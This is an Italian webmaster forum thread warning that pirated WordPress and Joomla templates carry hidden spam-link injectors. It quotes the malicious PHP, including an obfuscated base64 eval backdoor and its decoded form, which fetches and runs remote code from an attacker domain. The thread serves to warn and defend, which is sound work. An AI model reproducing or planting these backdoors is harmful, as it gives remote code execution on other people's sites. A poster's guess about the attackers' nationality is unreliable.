Blog template compromessi, state attenti!

[paolino_delta_t]

Vorrei mettere in guardia i webmaster da un pericolo che sta girando da qualche anno sul web italiano e internazionale....

qualche tempo fa un utente del forum GT riportò la cosa, ma anche lì passò in sordina anche se è un problema non da poco

chi frequenta le SERP relative ai casinò online, porno, viagra, hotel, ecc.... avrà sicuramente notato la presenza in posizioni di primo piano ( addirittura per casinò online ci sono ben 4 siti dello stesso personaggio/gruppo nelle prime 4 posizioni e altre 3 più giù ) di siti con nomi di dominio assurdi tipo whlyw.com, ijcai-01.org, ilfederalismo.net, ecc...

i domini in questione sono domini scaduti poi registrati di nuovo e fin qui nulla di strano

il problema è che il tizio che li gestisce sta guadagnando backlinks hackando i temi wordpress e joomla

in pratica questo signore inserisce un codice di questo tipo

codice:

< ?php

function credits()
{
$url = "http://get.templatesbrowser.com/wp.php?" .
"url=" . urlencode($_SERVER['REQUEST_URI']) . "&" . "host=" . urlencode($_SERVER['HTTP_HOST']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
@readfile($url);
fclose($check);
}
}

?>

nel template e poi lo redistribuisce ad ignari webmaster che si ritrovano con link nascosti nei loro blog del tipo

codice:

<script type="text/javascript"  language="javascript"> var sc_counter=1496753; var sc_project=2511135; var sc_invisible=0; var sc_partition=24; var  sc_security="30734c7d"; </script> <script type="text/javascript" language="javascript"  src="http://www.statcounter.com/counter/counter.js"></script><noscript>casin&ograve; online</noscript>

questa cosa è stata già notato da oltre un anno e ci sono molti articoli interessanti a riguardo

http://www.bracingyourbrand.com/37/m...black-hat.html
http://forum.joomla.org/index.php/topic,185573.0.html

il problema affligge sia Wordpress sia Joomla

adesso non voglio entrare nel merito delle questioni morali, ma qui se non sbaglio si configura un reato sia secondo la legge italiana che quella americana ( Fellony Act )

è sconcertante che Google e soci non prendano provvedimenti anzi i siti che diffondono questi template taroccati si sponsorizzano attraverso Adwords

comunque spero di aver messo la pulce nell'orecchio almeno ai webmaster....vi consiglio di controllare i vostri template alla ricerca di codice strano

[bidibodibù]

Quindi uno vovrebbe controllare nel codice dei propri blog fatti con wordpress o con Joomla se compare quel tipo di javascript con i link annessi.

Che appunto viengono inseriti con un semplice tag noscript.

Ma lui come lo inserisce?
Attraverso il primo codice php presente nel template che offre gratis?

grazie

[paolino_delta_t]

Originariamente inviato da bidibodibù
Quindi uno vovrebbe controllare nel codice dei propri blog fatti con wordpress o con Joomla se compare quel tipo di javascript con i link annessi.

Che appunto viengono inseriti con un semplice tag noscript.

Ma lui come lo inserisce?
Attraverso il primo codice php presente nel template che offre gratis?

grazie

esatto il codice PHP inserito in alcuni file del template contatta il server templatesbrowser.com da cui scarica il codice html/javascript da inserire

il bello è che così facendo può cambiare gli URL dei link, gli anchor text, tenere statistiche su quanti link ha, dove sono posizionati, ecc....

è un problema enorme sia per la privacy che in termini legali, infatti i link a siti di casinò sono illegali e si possono correre seri rischi

[bidibodibù]

I nomi di questi template si sanno?

[paolino_delta_t]

Originariamente inviato da bidibodibù
I nomi di questi template si sanno?

il problema è che sono i template normalmente usati dai webmaster, solo che vengono modificati e rimessi in circolazione taroccati

piuttosto stavo cercando di capire tramite quali siti vengono diffusi, ma guardando templatesbrowser.com c'è solo una pagina bianca....

è mai possible che sto tizio arrivi addirittura a ficcare i suoi template tarocchi nei normali siti per la distribuzione di template?

[paolino_delta_t]

guardate che altro ho trovato....

un sito in prima posizione su Adwords ( quindi Google.com, ecc... ) per la key "temi wordpress"...l'url è h**p://wp.themes.org.in/ ....cioè già il nome è "misleading", visto che qualcuno potrebbe pensare si tratti del sito ufficiale di Wordpress

scaricate un tema, io ho scaricato Silver....

nel file footer.php troverete una cosa interessantissima

codice:

<?php @eval(@base64_decode("QGV2YWwoQHN0cl9yb3QxMyhAZ3ppbmZsYXRlKEBiYXNlNjRfZGVjb2RlKCJkVkxOanBzd0VMN25LYWFvYXNnQm82cUhTZzBoa2FKTnBCNmlhcVVlZGkvSWRtMFRpZ0FQWU1sVWZmY2FBMHZiMVhMQk05L1B6SGg4VEpNajd6bTBPVzJVWVJSYW84UDN1YkE3K0hYQ2UyWERVMnNzWmgycXJHRlVJVlZ5d25mNzMzczR6dkxUS0F0NnBmaVhPQzZZMEZ5Z2xFVDFPS0FrRkJVeE5ENDYwdUhUNTJEbmRkcmN3Y1ZCeTVoQ0VhUWJjRi9DMHc4TjQrVWU1cmFNa0NvcnNSTGh6b2tncWFBWDJCNkNDYTR0Nnd4dFdiaDFIVzI5YjVEK0Q5RnF3QWxMNGlvbGNMTVdIa3pYS3drUEtGSGNVWk1rNWk4TnZLMEhJNEVMbG10YkFtY0ZDdFJRbDJ0VHkveEZRWHBYd0ZaVXk3clVLRTFIU2NPRzJOOUhMSTI5bzRncy9zeGxOS1VDVUVaWlBBUVhqOEhUaUlISGd2VHYzRGdDT04vWFJWOHVuWWx1OWZ1NnBJTjBQSjdIbzc4R1AzRVN1eTJrbS9YdlJ5OTROaTBsOUZPNzlMS3JXbUNsRzVFUHRmT2IyZVBMV1BOK1RhdmZJcFJ1ZzAzLzdYSlo5dXlsaGpZMjF3amg5Zkg1L0hTN1BwNXYxKzlBWUJ0UC9KYUpnVGppc3IxL21sMUM3K2M5MzBYUmJJeE56M3hqTkIreUh6a0tnM0lhQnVhSXpFeGxCaFNaVkl5SEh5ZUNSUGZPdFNORWtTOVdNMTJPMVhvMTJIVHpCdz09IikpKSk7")); ?>

è un codice offuscato, o meglio usa una tecnica di doppio offuscamento

se provate a decriptarlo alla fine uscirà

codice:

?php function fid($url) {@eval(@file_get_contents($url));}; ?><?php @fid("http://wordpress.themes.net.in/?fid=37"); ?><div id="footer">
    

&copy; <?php first_year() ?> <?php bloginfo('name'); ?>. All Rights Reserved.</p>
    

<?php bloginfo('name'); ?> is proudly powered by Silver Lexus and WordPress.</p>
</div>

</div>

<?php wp_footer(); ?>

la funzione fid scarica il link che verrà inserito nella pagina all'atto della creazione dal motore Wordpress

astuti eh!?!

e guardando il tld usato per registrare il dominio ho la conferma che la mano che sta operando è cinese

[bidibodibù]

Originariamente inviato da paolino_delta_t
e guardando il tld usato per registrare il dominio ho la conferma che la mano che sta operando è cinese

Tanto per cambiare.
Sono molto preoccupato dello spam che stanno facendo in generale su internet.

[weppos]

Il tema non riguarda particolarmente questa sezione, vorrei valutare di spostarlo in sicurezza (o CMS).
Questo a parte, paolino_delta_t, la tua segnalazione merita un po' di visibilità.

Qualcosa in contrario se pubblico un post sul blog di HTML.it?

[paolino_delta_t]

Originariamente inviato da weppos
Qualcosa in contrario se pubblico un post sul blog di HTML.it?

no anzi, almeno così avvisiamo quanta più gente è possibile

[alvi2000]

Purtroppo sono anomalie congenite potenzialmente dannose presenti in tutte quelle piattaforme gratuite : cms, template, forum, etc... si risolve un caso ma ne salteranno fuori mille perché é troppo facile ingannare gli scariconi delle piattaforme free e inoltre di solito ci sono bug che una volta scoperti possono essere sfruttati su larga scala.

Facendo un commento più a tema con questo forum penso che in un web maturo i cms dovranno essere più professionali e dovranno essere a pagamento con tanto di garanzie rilasciate dal venditore, ma siamo ancora nella fase dei download gratuiti e quindi amen.